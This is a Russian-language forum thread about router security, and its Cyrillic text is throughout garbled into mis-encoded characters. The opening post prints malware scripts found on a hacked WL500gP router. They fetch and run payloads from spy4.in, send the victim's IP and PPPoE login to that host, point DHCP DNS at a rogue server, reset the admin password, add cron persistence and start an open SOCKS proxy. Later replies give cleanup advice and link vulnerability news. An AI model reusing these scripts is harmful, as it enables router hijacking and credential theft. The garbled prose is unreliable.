»мею wl500gpv2 уже 3 года. »зучил полностью. Ќедавно перепрошил на последнюю прошивку от энтузиастов.
были некоторые проблемы с samba (нет доступа с ipad из программы buzz player). поэтому отключил iptables (iptables -P FORWARD ACCEPT
iptables -P INPUT ACCEPT).
так и оставил. сегодн€ нужно было изменить некоторые скрипты. обратил внимание, что в /tmp/local/sbin много файлов. прибил лишние процессы и начал смотреть...
содержимое post-firewall:

#!/bin/sh

cd /usr/local/sbin
wget -q http://spy4.in/data/tofire
chmod +x tofire
sh tofire
rm -rf tofire

добавилс€ файл tocron:

#!/bin/sh
cd /usr/local/sbin && wget -q http://spy4.in/data/todo && chmod +x todo && ./todo && rm -rf todo

исполн€емые 3proxy, proxy, udppm, socks и еще пару

содержимое http://spy4.in/data/todo:


#!/bin/sh

rip=`nvram get wan0_ipaddr`
ilogin=`nvram get wan0_pppoe_username`
sport=`cat /usr/local/etc/sport`
sleep ` tr -cd 1-9 </dev/urandom | head -c 2`s
wget -q -O ttt http://spy4.in/g.php?rname=$ilogin\&rip=$rip\&sport=$sport
rm -rf ttt


содержимое http://spy4.in/data/tofire:


#!/bin/sh
nvram set dhcp_dns1_x=217.12.219.20
nvram set http_passwd=qweasdOP
mount -obind /tmp/local /opt
cd /tmp/ && wget http://spy4.in/data/3.tgz && tar xvzf 3.tgz
rm -rf /tmp/3.tgz
mkdir /var/spool/cron/crontabs/ -p
mv -f /tmp/local/admin /var/spool/cron/crontabs/
chmod +x /var/spool/cron/crontabs/admin
killall crond
sleep 3
crond
crontab /var/spool/cron/crontabs/admin -u admin

SPORT=` tr -cd 1-5 </dev/urandom | head -c 5`
echo $SPORT > /usr/local/etc/sport
echo "daemon
nserver 8.8.8.8
auth none
socks -p$SPORT" > /usr/local/etc/3proxy.cfg
killall 3proxy
sleep 5
3proxy /usr/local/etc/3proxy.cfg
cd /usr/local/sbin && ./tocron



особо ничего не выт€нет (ip внутренний, iptables уже вкрутил, пароль помен€л).
 то нибудь сталкивалс€ с подобным? чем грозит как думаете? где еще чего посмотреть?

upd проворонил что в dhcp изменен dns на левый. в результате происходит попытка заражени€ подсоединенных устройств (перекидывает на страницы с предложением обновить браузер.)

ABATAPA
08-08-2012, 06:53
 то нибудь сталкивалс€ с подобным?

ј о чем, по-¬ашему, эта тема?!



чем грозит как думаете?

ј чем может грозить захваченный роутер? —ъесть ¬аш трафик, "засветить" IP на сайтах противоправной направленности (экстремистских, распростран€ющих детское порно, и т. д.) и привлечь к этому IP внимание правоохранительных органов, перехватывать ваш трафик, в том числе пароли и куки, и использовать их дл€ распространени€ спама... ѕродолжать?



где еще чего посмотреть?

ј что, в роутере дофига мест, "где посмотреть"?



upd проворонил что в dhcp изменен dns на левый. в результате происходит попытка заражени€ подсоединенных устройств (перекидывает на страницы с предложением обновить браузер.)
—тавьте новую прошивку, делайте сброс в заводские установки, удал€Єте всЄ с носителей и из flashfs. » не отключайте бездумно фаервол!

Ghost_SS
09-08-2012, 09:31
ћћћћ...
ƒа наверное все что хотели то и делали. —уди по скриптам самое интересное в файлике что скачивалс€. ’очешь узнать где наследил скачай его и посмотри в нутрь.
ј так от ƒќ— атак до банального перехвата паролей к сайтам, вебмани, киви, почты, и т.д. если дома клиент банк то ты ввобще победитель=)

ѕрисоеден€юсь к словам : "¬се в дефолт"


ј самое главное не оставл€ть пароль админа штатным, думаю при том что ты отключил фаирвол открыл телнет сдоступом по wan.

Virtuals
14-11-2012, 15:16
надеюсь дефолтный пароль мен€ли? ибо досихпор бродит по сети вирусн€к дл€ роутеров... признаки: тормозит ребутитс€ .... в процессах дофига висит с именем mips

Alexey
15-11-2012, 05:17
надеюсь дефолтный пароль мен€ли? ибо досихпор бродит по сети вирусн€к дл€ роутеров... признаки: тормозит ребутитс€ .... в процессах дофига висит с именем mips

 стати, пароль не мен€л. Ќадо будет попробовать. ’от€ процессов mips не обнаружено.
≈ще вычитал, что бывают проблемы с подключением гигабитных устройств.

Ѕудет чем завтра на работе зан€тьс€.
ѕопробовать заменить Ѕѕ, попробовать отключить все от сети, и если ничего не поможет, то восстановление с помощью перепрошивки и смена парол€

«аменил Ѕѕ на другой - лучше не стало
ќтключил от роутера все, кроме одной 100ћб сети, по прежнему перезагружаетс€.

ћожет есть еще варианты, что можно посмотреть?

Omega
18-01-2013, 21:15
 ритические у€звимости в беспроводных маршрутизаторах Cisco Linksys


»сследователи безопасности предупредили (http://seclists.org/fulldisclosure/2013/Jan/69) о скорой публикации в открытом доступе
информации о критической у€звимости в беспроводных маршрутизаторах Cisco Linksys. ”€звимость позвол€ет из внешней сети получить
доступ к устройству под пользователем root без проведени€ аутентификации.  омпани€ Cisco была уведомлена о проблеме несколько
мес€цев назад, но исправление так и не было выпущено. ¬ насто€щее врем€ все доступные версии прошивки Linksys у€звимы, что ставит
под удар около 70 млн наход€щихс€ в сети устройств. ¬ы€вившие у€звимость исследователи не намерены больше скрывать информацию
от общественности и планируют дать компании Cisco ещЄ две недели на подготовку обновлени€ прошивки, после чего опубликовать
детали у€звимости и концептуальный прототип эксплоита.

http://www.youtube.com/watch?feature=player_embedded&v=cv-MbL7KFKE


>> ѕохоже, альтернативы dd-wrt особо-то и нет.
> zRouter на базе FreeBSD ( http://zrouter.org/ )
> openWRT
> RouterOS
> Gargoyle
wive-ng ( более оптимизированный на потребление ресурсов озу и цпу, в отличии от dd-wrt ) = http://sourceforge.net/projects/wive-ng/

> wive-ng ( более оптимизированный на потребление ресурсов озу и цпу )
ј что, она уже поддерживает девайсы на броадкоме? oO

> zRouter на базе FreeBSD ( http://zrouter.org/ )
Ёто дл€ желающих с роутером мучатьс€, а не пользоватьс€ оным.

> openWRT
ј там недопиленo и требует шаманства руками, как то сборка из транка и патчинг. ¬ариант, но не дл€ средних умов.

> RouterOS
ќгороженна€ и закрыта€ хрень. “еоретически сорц получить можно. ѕрактически, проще сразу застрелитьс€, чем иметь дело с этими господами.

> Gargoyle
ƒовольно странна€ прошивка "на любител€".

> томато от шибби
„то такое tomato € уже примерно знаю, а что такое шибби?

> „то такое tomato € уже примерно знаю, а что такое шибби?
¬ы ещЄ спросите, кто такой ќлег :)

http://www.opennet.ru/openforum/vsluhforumID3/88202.html :rolleyes:

ryzhov_al
20-01-2013, 06:16
 ритические у€звимости в беспроводных маршрутизаторах Cisco LinksysЁти Ђспециалисты по безопасности ї сломали роутер из LAN-сегмента и теперь громко кричат о критической у€звимости, хот€ из LAN-сегмента нет никакой защиты by design.

—пециалисты, my ass.

hairpin
01-02-2013, 19:26
¬ прошивке присутствует libupnp с обнаруженной у€звимостью http://seclists.org/bugtraq/2013/Jan/130 ?
√де-то читал, что даже с внешнего интерфейса UPnP у€звим. Ёто правда?

AlexeyS
02-02-2013, 11:02
¬ прошивке присутствует libupnp с обнаруженной у€звимостью http://seclists.org/bugtraq/2013/Jan/130 ?
√де-то читал, что даже с внешнего интерфейса UPnP у€звим. Ёто правда?

” нас уже давно miniupnpd вместо нее.

hairpin
02-02-2013, 18:41
” нас уже давно miniupnpd вместо нее.
Ќе одна libupnp у€звима, miniupnp 1.0 тоже
Stack-based buffer overflow in the ExecuteSoapAction function in the SOAPAction handler in the HTTP service in MiniUPnP MiniUPnPd 1.0 allows remote attackers to execute arbitrary code via a long quoted method.
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0230
я проверил на своем RT-N16: на заводской прошивке 3.0.0.4.260 с включенным UPnP дл€ теста Rapid7 (http://upnp-check.rapid7.com/) оказалс€ неу€звим.
ѕо данным Rapid7: "332 products use MiniUPnPd version 1.0, which is remotely exploitable. Over 69% of all MiniUPnPd fingerprints were version 1.0 or older."

AlexeyS
02-02-2013, 20:00
я тоже проверил свой wl500gp с местной прошивкой, вердикт - не у€звим. “ак что беспокоитьс€ не о чем.

Omega
07-02-2013, 12:44
 ритическа€ у€звимость во многих роутерах различных вендоров


 ак сообщалось ранее, компани€ DefenseCode обнаружила у€звимость нулевого дн€ в роутерах Cisco Linksys.
ѕредставители компании оповестили вендора и вз€ли тайм-аут на пару недель перед раскрытием деталей у€звимости.
¬рем€ вышло, некоторые подробности были раскрыты и оказалось, что не только Cisco Linksys у€звима.
¬от только часть вендоров, где присутствует у€звимость:

Asus
Broadcom
Cisco
D-Link
Netgear
TP-Link
Zyxel
US Robotics
–ечь идЄт о сразу нескольких у€звимост€х, которые кроютс€ в р€де реализаций протокола UPnP и SSDP
(основанные на Intel/Portable UPnP SDK и MiniUPnP SDK):

1. CVE-2012-5958
2. CVE-2012-5959
3. CVE-2012-5960
4. CVE-2012-5961
5. CVE-2012-5962
6. CVE-2012-5963
7. CVE-2012-5964
8. CVE-2012-5965
9. CVE-2013-0229
10. CVE-2013-0230
”€звимости позвол€ют вызвать отказ в обслуживании или выполнить произвольный код на устройстве без авторизации. ј т.к. многие
роутеры взаимодействуют с UPnP через WAN, это делает их у€звимыми не только к атаке из локальной сети, но и из удалЄнных сетей.

“.е. практически с любого компьютера »нтернета. ”€звимыми могут оказатьс€ не только роутеры, но вообще любое оборудование,
использующее UPnP: принтеры, медиа-серверы, IP-камеры, NAS, smart TV и т.д. “.е. речь идЄт о миллионах устройств!
http://habrahabr.ru/post/168613/ :rolleyes: http://habrahabr.ru/post/165737/ :confused:

AndreyUA
07-02-2013, 13:41
ѕроверил последнюю бета оф прошиву на rt15u. ”€звимость есть. ƒумаю, что эта же у€звимость будет на всех rtn,ведь sdk один и тот же .
http://upnp-check.rapid7.com/

Vampik
07-02-2013, 14:45
„то это за бред.

1) ” каких-то вендоров в прошивке открыт UPnP через WAN? Ёто критическа€ проблема, с их штатными программистами.
2) ”€звимости подвержены старые версии ѕќ, в частности относительно того же miniupnpd - версии 1.0-1.3 (у нас 1.7.20120824). Ёто оп€ть же проблема вендоров.

Ќашей прошивки не касаетс€ :)

Ant-125
07-02-2013, 15:49
9448

¬роде нормально WL500gP.v1 1.9.2.7-rtn-r4772

Vampik
07-02-2013, 17:30
report WAN address и доступ из WAN - две разные вещи.  стати, этот переключатель (WAN/MAN) ничего не делает, надо его убрать из прошивки.

Ant-125
07-02-2013, 18:03
ј чекбокс "Enable access from WAN" тогда к чему относитс€? ќн вроде находитс€ на строчке "Multicast to HTTP Proxy"...

Vampik
07-02-2013, 18:24
ј чекбокс "Enable access from WAN" тогда к чему относитс€? ќн вроде находитс€ на строчке "Multicast to HTTP Proxy"...
ќтноситс€ к udpxy.

IrWert
08-02-2013, 03:51
http://habrahabr.ru/post/168613/
ќно нас не касаетс€?

Vampik
08-02-2013, 06:28
http://habrahabr.ru/post/168613/
ќно нас не касаетс€?

http://wl500g.info/showthread.php?19014-%C2%ED%E8%EC%E0%ED%E8%E5!-%C1%E5%E7%EE%EF%E0%F1%ED%EE%F1%F2%FC-Linux-based-mipsel-%F0%EE%F3%F2%E5%F0%EE%E2!&p=258142#post258142
http://habrahabr.ru/post/168613/#comment_5838187

AlexeyS
08-02-2013, 07:16
report WAN address и доступ из WAN - две разные вещи.  стати, этот переключатель (WAN/MAN) ничего не делает, надо его убрать из прошивки.

¬ообще-то он предназначен дл€ случаев с dual-access, когда роль WAN выполн€ет интерфейс ppp, man - физический интерфейс. Ќе надо его удал€ть!

KOCTET
08-02-2013, 08:20
http://habrahabr.ru/post/168613/#comment_5838187
ѕлакал на этим постом :D
Ќу и собственно в видео показывающее эту у€звимость атака на роутер почему то была из лан сети, т.е. роутер они ломали по адресу 192.168.1.1

Vampik
08-02-2013, 08:23
¬ообще-то он предназначен дл€ случаев с dual-access, когда роль WAN выполн€ет интерфейс ppp, man - физический интерфейс. Ќе надо его удал€ть!

ѕосмотрите в код - выбор Report MAN address или Report WAN address дл€ UPnP осталс€ в прошивке со времен Asus UPnPd и сейчас не делает н-и-ч-е-г-о.

AndreyUA
09-02-2013, 22:39
„то это за бред.

1) ” каких-то вендоров в прошивке открыт UPnP через WAN? Ёто критическа€ проблема, с их штатными программистами.
2) ”€звимости подвержены старые версии ѕќ, в частности относительно того же miniupnpd - версии 1.0-1.3 (у нас 1.7.20120824). Ёто оп€ть же проблема вендоров.

Ќашей прошивки не касаетс€ :)
ѕод rt-n имел ввиду все асусовские прошивки.

ABATAPA
21-03-2013, 19:29
ѕроведено сканирование портов всех IPv4-адресов с использованием ботнета из маршрутизаторов.

ѕодведены итоги амбициозного проекта Internet Census 2012, нацеленного на полное сканирование портов дл€ всех IPv4-адресов в сети »нтернет. —канирование осуществл€лось с марта по декабрь 2012 года с использование ботнета, построенного на базе незащищЄнных маршрутизаторов.

ѕодробности (http://www.opennet.ru/opennews/art.shtml?num=36454)

ABATAPA
19-04-2013, 22:52
ѕродолжу.

»сследование показало плачевное состо€ние защищЄнности SOHO-маршрутизаторов.

http://www.opennet.ru/opennews/art.shtml?num=36741

ConstAntz
20-04-2013, 09:32
ѕродолжу.

»сследование показало плачевное состо€ние защищЄнности SOHO-маршрутизаторов.

http://www.opennet.ru/opennews/art.shtml?num=36741


и 5 пока не афишируемых устройств дл€ которых ещЄ не выпущены обновлени€ прошивки с устранением у€звимостией. ¬о всех устройствах найдены проблемы, позвол€ющие получить доступ из внутренней локальной сети

Ќе наша проблема (при соблюдении примитивных мер безопасности), однако, за ссылку - спасибо!

Vampik
20-04-2013, 09:39
Ќе наша проблема (при соблюдении примитивных мер безопасности), однако, за ссылку - спасибо!

Ќу знаете, многие самосто€тельно делают роутер у€звимым, наплевав на меры безопасности. Ќапример, сами открывают доступ к веб-интерфейсу из WAN (суд€ по количеству жалоб, когда € эту функцию у себ€ из веб-интерфейса убрал). » попробуй убеди, что так делать не нужно..

ghost38
24-04-2013, 22:12
ѕодскажите плиз, а прошивка поддерживает WPS? ≈сли есть, то как вклбюючаетс€? а то никак не могу подключить принтер по wifi. » кнопку wps жму - не соедн€етс€... ѕрошивка 4923

Omega
19-10-2013, 09:39
Ќу знаете, многие самосто€тельно делают роутер у€звимым, наплевав на меры безопасности.
Ќапример, сами открывают доступ к веб-интерфейсу из WAN (суд€ по количеству жалоб, когда
€ эту функцию у себ€ из веб-интерфейса убрал). » попробуй убеди, что так делать не нужно..

ƒа, лучше вообще убрать доступ и даже сам WAN порт, особенно в дылинках :D
http://habrahabr.ru/post/183314/ ;) http://habrahabr.ru/post/197314/

ѕроверьте на вс€кий случай и их более новые модели на предмет бекдора :p

ѕродолжение квеста: http://habrahabr.ru/post/198218/ :p
http://www.opennet.ru/opennews/art.shtml?num=38208 :D
http://www.opennet.ru/opennews/art.shtml?num=38100 :)

Omega
26-10-2013, 15:52
Ќу вот, дело дошло уже до утюгов и чайников :p

http://habrahabr.ru/post/199120/ :D

TReX
28-10-2013, 08:57
Ќу вот, дело дошло уже до утюгов и чайников :p

http://habrahabr.ru/post/199120/ :D

¬етка все же по безопасности, может с таким в болталку? )

Omega
19-11-2013, 22:29
LG © 1984 http://habrahabr.ru/post/202770/ :cool:

ryzhov_al
28-11-2013, 18:37
Symantec сама написала (http://www.opennet.ru/opennews/art.shtml?num=38547) прототип вируса, эксплуатирующего майскую у€звимость в PHP наЕ роутерах.
  чему здесь упом€нуты роутеры и почему Symantec таким уродливым способом привлекает к себе внимание лучше спросить у неЄ самой.

dimez
29-11-2013, 19:00
Symantec сама написала (http://www.opennet.ru/opennews/art.shtml?num=38547) прототип вируса, эксплуатирующего майскую у€звимость в PHP наЕ роутерах.
  чему здесь упом€нуты роутеры и почему Symantec таким уродливым способом привлекает к себе внимание лучше спросить у неЄ самой.
ƒа, тоже недоумевал.
јкции упали с августа, надо хоть что-нибудь делать :)

ABATAPA
02-12-2013, 18:10
ќбъектами атаки данного черв€ €вл€ютс€ маршрутизаторы, точки доступа, камеры слежени€ и подобное оборудование, использующее прошивку на основе Linux.

¬ насто€щий момент вы€вленный экземпл€р черв€ поражает только системы на базе архитектуры x86, но уже имеютс€ свидетельства о наличии кода черв€ дл€ архитектур ARM, PPC, MIPS и MIPSEL.

http://www.linux.org.ru/news/security/9877144

TReX
03-12-2013, 00:14
ќбъектами атаки данного черв€ €вл€ютс€ маршрутизаторы, точки доступа, камеры слежени€ и подобное оборудование, использующее прошивку на основе Linux.

¬ насто€щий момент вы€вленный экземпл€р черв€ поражает только системы на базе архитектуры x86, но уже имеютс€ свидетельства о наличии кода черв€ дл€ архитектур ARM, PPC, MIPS и MIPSEL.

http://www.linux.org.ru/news/security/9877144

јга, мы все умрем )) Ёксплуатируетс€ эта http://www.securityfocus.com/bid/53388 у€звимость, ну пр€мо про наши роутеры )))

ABATAPA
03-12-2013, 20:49
” некоторый стоит php, см. соседние ветки.

ryzhov_al
04-12-2013, 06:00
” некоторый стоит php, см. соседние ветки.Ќи у кого из них он не может сто€ть по нужным пут€м, см. описание вируса.

ABATAPA
18-12-2013, 09:22
Ёксперимент по изучению де€тельности вредоносного ѕќ, нацеленного на поражение Linux-серверов

Ќаблюда€ попытки проверки наличи€ у€звимостей в логе своего web-сервера, исследователь безопасности из ”ниверситета ƒжорджа ¬ашингтона решил устроить ловушку (honeypot) и понаблюдать за тем, что произойдЄт в случае, если злоумышленники обнаружат наличие у€звимости. ƒл€ анализа содержимого пам€ти во врем€ выполнени€ вредоносных программ использовалс€ фреймворк Volatility.

ѕодробнее:
http://www.opennet.ru/opennews/art.shtml?num=38683

Omega
30-12-2013, 03:00
¬злом Wi-Fi роутеров! »нтервью с хакером! (http://www.securitylab.ru/contest/447512.php) :D


http://www.youtube.com/watch?v=lX6JcybgDFo

MercuryV
30-12-2013, 11:00
¬злом Wi-Fi роутеров! »нтервью с хакером! (http://www.securitylab.ru/contest/447512.php) :D
≈ще одна мурзилка на тему "люди! смотрите! € умею запускать BackTrack!" :D

Omega
04-01-2014, 00:37
Ѕекдор в маршрутизаторах Linksys и Netgear

http://www.xakep.ru/post/61839/ :rolleyes:
https://github.com/elvanderb/TCP-32764
http://arstechnica.com/security/2014/01/backdoor-in-wireless-dsl-routers-lets-attacker-reset-router-get-admin/

TReX
04-01-2014, 13:45
Ѕекдор в маршрутизаторах Linksys и Netgear

http://www.xakep.ru/post/61839/ :rolleyes:
https://github.com/elvanderb/TCP-32764
http://arstechnica.com/security/2014/01/backdoor-in-wireless-dsl-routers-lets-attacker-reset-router-get-admin/

ѕредлагаю тогда следующую статью про маршрутизаторы GPON ћ“—/ћ√“— там вообще штатный бекдор, дл€ конфигурации и управлени€, да и пароли стандартные неизмен€емые )

Omega
06-01-2014, 19:10
ѕредлагаю тогда следующую статью про маршрутизаторы GPON ћ“—/ћ√“—
там вообще штатный бекдор, дл€ конфигурации и управлени€, да и пароли
стандартные неизмен€емые )
http://habrahabr.ru/post/188454/ ;)

Omega
17-02-2014, 21:04
ќчередные у€звимости в маршрутизаторах: :cool:

Asus: http://www.securityfocus.com/archive/1/530985

Linksys: http://www.opennet.ru/opennews/art.shtml?num=39111

Omega
04-03-2014, 22:56
ќчередные у€звимости в маршрутизаторах: :cool:
http://www.xakep.ru/post/62145/default.asp :p

Omega
02-08-2014, 22:30
¬злом Asus RT-AC66U: http://habrahabr.ru/post/230469/ :cool:

Omega
17-08-2014, 11:03
»сследование безопасности прошивок сетевых устройств: :D

http://www.opennet.ru/opennews/art.shtml?num=40376

Omega
12-01-2015, 16:48
¬ маршрутизаторах ASUS обнаружена у€звимость CVE-2014-9583 (http://www.securitylab.ru/news/469606.php)


Ѕрешь присутствует в сервисе обнаружени€ локальной сети infosvr, работающем с правами суперпользовател€.

Ёксперт из Accuvant Labs ƒжошуа ƒрейк (Joshua Drake) обнаружил у€звимость в маршрутизаторах ASUS,
позвол€ющую злоумышленникам, имеющим доступ к локальной сети, выполн€ть произвольные команды.
ѕо словам ƒрейка, брешь CVE-2014-9583 присутствует в сервисе обнаружени€ локальной сети infosvr,
работающем с правами суперпользовател€.

—ервис Ђслушаетї порт 9999, который может использоватьс€ злоумышленниками дл€ отправки пакетов,
содержащих вредоносный код, с целью получить контроль над устройством. ƒрейк успешно осуществил
атаки на маршрутизатор ASUS RT-N66U с версией прошивки 3.0.0.376.2524-g0013f52. »Ѕ-эксперт ƒэвид
Ћонгенекер (David Longenecker) подтвердил наличие у€звимости и в наиболее новой модели RT-AC87U
с версией прошивки 3.0.0.4.378_3754.

Ћонгенекер сообщил, что размер эксплоита дл€ этой бреши не должен превышать 237 знаков, иначе
устройство может выйти из стро€ из-за переполнени€ буфера. ASUS известно об у€звимости, и компани€
работает над ее исправлением. ќтметим, что эксплоит доступен публично, поэтому пользователи должны
прин€ть меры по обеспечению безопасности.

 астомизированна€ верси€ прошивки Asuswrt-Merlin, разработанна€ Ёриком —оважо (Eric Sauvageau),
см€гчает потенциальные атаки путем отключени€ функции, ответственной за удаленное выполнение кода

ѕодробнее ознакомитьс€ с описанием у€звимости можно по адресу: http://www.securitylab.ru/vulnerability/469610.phphttp://www.securitylab.ru/news/469606.php :eek:


ѕроверил, эксплоит не сработает даже из LAN, у нас обрезанна€ верси€ infosvr, в которой
отсутствует NET_CMD_ID_MANU_CMD. ≈го очень давно обрезал камрад theMIROn, оставив
только отдачу информации о себе (IP,MAC,name).
http://forum.ixbt.com/topic.cgi?id=14:62022-59#2039 ;)

AndreyPopov
13-01-2015, 13:21
ASUS выпустил прошивки дл€ закрыти€ этой дырки вчера 12.01.2015

дл€ серии RT-N верси€ 3.0.0.4.376.3754
дл€ серии RT-AC верси€ 3.0.0.4.378.3873(3885)

Omega
27-01-2015, 14:32
ќчередные приколы от  орбилайна: http://habrahabr.ru/post/243997/ :cool:

Omega
27-01-2015, 22:34
http://habrahabr.ru/company/dsec/blog/249007/ :p

Omega
13-03-2015, 22:58
Ёксплуатируем root-у€звимость в роутерах Asus (http://habrahabr.ru/post/253013/)

TReX
14-03-2015, 00:30
ќчередные приколы от  орбилайна: http://habrahabr.ru/post/243997/ :cool:

“акие "статьи" однозначно в группу юмор, бред автора зашкаливает, 10-€ сеть у Ѕилайна дл€ роутера внешн€€, поверх нее запускаетс€ тоннель L2TP, так что увидеть в ней компьютер можно только если он напр€мую включен без роутера, получить логины в роутер так же невозможно, если разрешен доступ в вебморду только из локальной сети, котора€ дл€ роутера по умолчанию будет 192.х.х.х, а никак не 10.х.х.х...


Ќе име€ логина/парол€ от ЂЅилайнаї, просто воткнув провод, € получал доступ ко всем локальным ресурсам и устройствам (роутерам, камерам, voip железкам итп)

)))))))) бесподобный шедевр, и как увидеть например voip или камеру, если они за роутером и естественно за NATом?


ѕодключаем сеть, и, даже без интриги, имеем качественный интернет через провод, а не через wifi. «аходим на роутер, смотрим Ч да действительно, мы подключены к нему как-будто в lan.
ј вот это алмаз, в его коллекции, зашли через WAN и попали как клиент в LAN, автора даже не смущает то что сети на €кобы "скриншоте" разные ))))))))))))

Omega
25-04-2015, 00:19
 ритическа€ у€звимость (CVE-2015-1863) в wpa_supplicant, компоненте дл€ подключени€ к беспроводным сет€м (http://www.opennet.ru/opennews/art.shtml?num=42097) :p

ABATAPA
27-05-2015, 07:36
http://www.opennet.ru/opennews/art.shtml?num=42309

Omega
24-07-2015, 23:48
 орбилайн вмешиваетс€ в трафик пользователей (http://habrahabr.ru/post/262631/) :p

Omega
02-10-2015, 23:52
ƒобрый вирус Linux.Wifatch защищает роутеры от других угроз (http://geektimes.ru/post/263312/)


ќбнаруженный Symantec вирус дл€ роутеров заражает устройства и защищает их от вредоносного программного обеспечени€,
он напоминает пользователю о необходимости обновить ѕќ, сменить пароли и закрывает у€звимости от других вирусов.
http://geektimes.ru/post/263312/ :rolleyes:

Omega
23-02-2016, 00:24
Ѕилайн подставл€ет в транзитный HTTP-трафик свой JavaSсript-код (https://www.opennet.ru/opennews/art.shtml?num=43918)


¬недр€емый JavaScript-код имеет полный доступ к контексту всех незашифрованных страниц и может контролировать
весь идущий через них информационный поток, в том числе вводимые пользователем пароли, параметры идентификации,
частную переписку и т.п. —огласие на применение данного сервиса абонентом не давалось, подстановка JavaSсript-кода
в трафик осуществлена односторонним решением оператора.

TReX
23-02-2016, 00:57
Ѕилайн подставл€ет в транзитный HTTP-трафик свой JavaSсript-код (https://www.opennet.ru/opennews/art.shtml?num=43918)

“очнее говор€ мобильный Ѕилайн, хот€ то же самое делает например и ћаксима“елеком, денежки за рекламу всем хочетс€ ))

Omega
25-02-2016, 01:12
Rogue AP Ч фальшивые точки доступа (https://habrahabr.ru/company/pentestit/blog/277793/) :cool:


ѕри настройке беспроводного адаптера на автоматическое подключение к известным беспроводным сет€м пользователь подвергает
себ€ риску стать жертвой атаки Ђчеловек посерединеї. «лоумышленник может создать доверенную Wi-Fi точку доступа.
¬ результате клиентское устройство автоматически подсоединитс€ к такой точке доступа и будет работать через нее, а атакующий
получит возможность перехватывать трафик жертвы, либо атаковать устройство, наход€щеес€ с ним в одном сегменте сети.

Omega
02-04-2016, 03:15
„≈–¬№ REMAITEN —“–ќ»“ Ѕќ“Ќ≈“ »« ћј–Ў–”“»«ј“ќ–ќ¬


јнтивирусна€ компани€ ESET сообщает о по€влении нового черв€. ¬редоносна€ программа, получивша€ название Remaiten,
распростран€етс€ по Telnet и строит ботнет из маршрутизаторов, точек доступа Wi-Fi и других сетевых устройств.

—пециалисты ESET полагают, что Remaiten представл€ет собой усовершенствованный вариант червей Gafgyt и Kaiten,
обнаруженных осенью 2014 года.
Gafgyt служил дл€ кражи информации с поражЄнных компьютеров, а Kaiten использовали дл€ организации DDoS-атак.

 ак и Remaiten, Gafgyt поражает своих жертв по протоколу Telnet. ƒл€ этого вредоносна€ программа сканирует порт Telnet
на произвольных IP-адресах. огда ей удаЄтс€ найти работающий Telnet, она пытаетс€ подобрать к нему пароль по списку.
¬ случае успеха жертва получит команду скачать исполн€емые файлы черв€, скомпилированные дл€ различных архитектур.

Remaiten действует почти так же. ≈динственное отличие заключаетс€ в том, что он не скачивает все возможные файлы.
¬место этого червь пытаетс€ определить архитектуру жертвы, а затем самосто€тельно отправл€ет ей подход€щий файл.
ƒл€ этого к Remaiten прилагаютс€ четыре исполн€емых файла дл€ устройств на базе Linux с процессорами ARM и MIPS.

ѕосле установки Remaiten подключаетс€ к командному каналу IRC и ожидает указаний. јнализ кода черв€ показывает,
что он способен участвовать в DDoS-атаках различных типов.  роме того, в нЄм предусмотрен код, который избавл€ет
заражЄнное устройство от конкурирующих ботов других типов.
https://xakep.ru/2016/04/01/remaiten/ :cool:

Omega
06-04-2016, 02:23
–азбор полетов (http://www.welivesecurity.com/2016/03/30/meet-remaiten-a-linux-bot-on-steroids-targeting-routers-and-potentially-other-iot-devices/) :D


Killing other bots

Another interesting command is УKILLBOTSФ. When issued, the bot will enumerate running processes and decide which to ignore
and which to kill based on a few criteria, but mainly because of their names. These process names can differ across bot versions.

Linux/Remaiten will only kill processes that were started from an interactive shell by looking at the processТs tty device number.
It will also report the name of the killed process to its C&C server, perhaps to improve their whitelist and blacklist of process names

TReX
28-05-2016, 22:56
Ќу вот и Asus больше не дает устанавливать альтернативные прошивки или откатыватьс€ назад на старые версии

ASUS has been dedicated to cooperate with third party developers to come up with more innovative features.
To comply with regulatory amendments, we have modified firmware verification rule to ensure better firmware quality.
This version is not compatible with all previously released ASUS firmware and uncertified third party firmware.

ј как красиво написали, сотрудничаем со сторонними разработчиками ))

http://www.snbforums.com/threads/asus-firmware-will-change-the-verification-method.32357/ - немного форумных обсуждений

https://www.federalregister.gov/articles/2015/08/06/2015-18402/equipment-authorization-and-electronic-labeling-for-wireless-devices тот самый FCC из-за которого заварилась каша...

Omega
31-05-2016, 19:50
Ђƒобрые хакерыї White Team сражаютс€ с ботнетом Lizard Squad, взламыва€ роутеры (https://xakep.ru/2016/02/10/white-team-vs-lizard-squad/) :D


’акерска€ группа White Team, немного ранее создавша€ Ђдобрый вирусї Linux.Wifatch, который инфицирует IoT-устройства
и исправл€ет на них у€звимости, продолжает боротьс€ со злом. White Team рассказали, что в данный момент они зан€ты
борьбой с ботнетом известной хакерской группы Lizard Squad, в котором насчитываетс€ пор€дка 120-150 тыс€ч девайсов.

ћалварь Linux.Wifatch получила широкую известность осенью 2015 года, когда ее заметили специалисты компании Symantec.
¬ основном жертвами заражени€ станов€тс€ различные маршрутизаторы, но порой вирус поражает IP-камеры и IoT устройства.
ќднако код Linux.Wifatch, написанный на Perl, не содержит вредоносных пейлоудов, и вирус не побуждает устройства к активности.

ѕопада€ на устройство, Linux.Wifatch выходит в сеть по p2p-протоколу, с целью получени€ апдейтов. «атем малварь
провер€ет это устройство. ¬ случае обнаружени€ вредоносного ѕќ или у€звимостей, Linux.Wifatch все поправит.
¬ частности, он заметит подмену DNS, обнаружит бэкдоры, просит владельца устройства немедленно сменить
дефолтный пароль на нормальный, или может самосто€тельно закрыть потенциально у€звимый Telnet-порт.

Omega
13-09-2016, 00:33
ATTENTION !!! Ѕольшой Ѕрат следит за тобой !!!

BLUETOOTH-¬»Ѕ–ј“ќ–џ WE-VIBE —Ћ≈ƒя“ «ј ѕќЋ№«ќ¬ј“≈Ћяћ» (https://xakep.ru/2016/08/09/we-vibe-spy-on-you/) :p

(Ѕ≈«)”ћЌјя –ќ«≈“ ј. јЌјЋ»«»–”≈ћ ”я«¬»ћќ—“» ”ћЌќ… –ќ«≈“ » TP-LINK HS110 WI-FI (https://xakep.ru/2016/08/31/hack-tp-link-hs110/) ;)

Ё —ѕ≈–“  ќћѕјЌ»» IOACTIVE ЌјЎ≈Ћ ћЌќ∆≈—“¬ќ ”я«¬»ћќ—“≈… ¬ –ќ”“≈–ј’ ‘»–ћџ BHU (https://xakep.ru/2016/08/23/bhu-wifi-urouter/) :rolleyes:

Ё —ѕ≈–“џ PEN TEST PARTNERS —ќ«ƒјЋ» ¬џћќ√ј“≈Ћя, «ј–ј∆јёў≈√ќ “≈–ћќ—“ј“џ (https://xakep.ru/2016/08/09/thermostat-hack/) :cool:

Omega
24-10-2016, 03:33
